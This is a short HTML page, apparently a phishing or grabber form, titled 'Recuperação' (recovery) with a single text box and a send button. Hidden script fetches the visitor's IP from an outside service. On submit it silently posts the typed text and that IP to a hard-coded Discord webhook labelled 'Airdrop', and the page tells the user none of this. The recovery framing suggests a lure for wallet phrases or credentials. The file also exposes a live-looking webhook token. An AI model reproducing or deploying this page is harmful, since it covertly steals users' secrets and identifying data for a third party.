<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Recuperação</title>
</head>
<body>
    <input type="text" id="mensagem" placeholder="Escreva algo...">
    <button  onclick="enviar()">Enviar</button>
</body>
<style>
    *{
        padding: 0px;
        margin: 0px;
        box-sizing: border-box;
        color: #EEEEEE;
    }
    body{
        background-color: rgb(30, 30, 30);
    }
    input{
        position: absolute;
        height: 40px;
        width: 90vw;
        top: 50vh;
        left: 5vw;
        border-radius: 5vw;
        border: 2px solid rgb(50, 50, 50);
        background-color: rgb(40, 40, 40);
    }
    input::placeholder{
        color: #EEEEEE;
    }
    button{
        position: absolute;
        height: 40px;
        width: 50vw;
        top: calc(50vh + 50px);
        left: 25vw;
        border-radius: 5vw;
        color: #EEEEEE;
        border: none;
        background-color: rgb(0, 134, 18);}
</style>
<script type="text/javascript" src="https://l2.io/ip.js?var=userip"></script>
<script>
function enviar(){
    const message = document.getElementById('mensagem').value
    const apiUrl = 'https://discord.com/api/webhooks/1275292719719251969/4RxcEFPcuqsUUC5CtfcRfti6rl48SH9J3Y0lR0cndx2juQkrBBDwJdPWZQ9QZ79eoGO9';
        var myEmbed = {
            author: {
                name: "Novo acesso"
            },
            title: message,
            description: userip.replaceAll('.', '-'),
            }

         
            var xhr = new XMLHttpRequest();
            xhr.open("POST", apiUrl, true);
            xhr.setRequestHeader('Content-Type', 'application/json');
            xhr.send(JSON.stringify({
                'content': "",
                'embeds':[myEmbed],
                'username': "Airdrop",
            }));



}
</script>
</html>
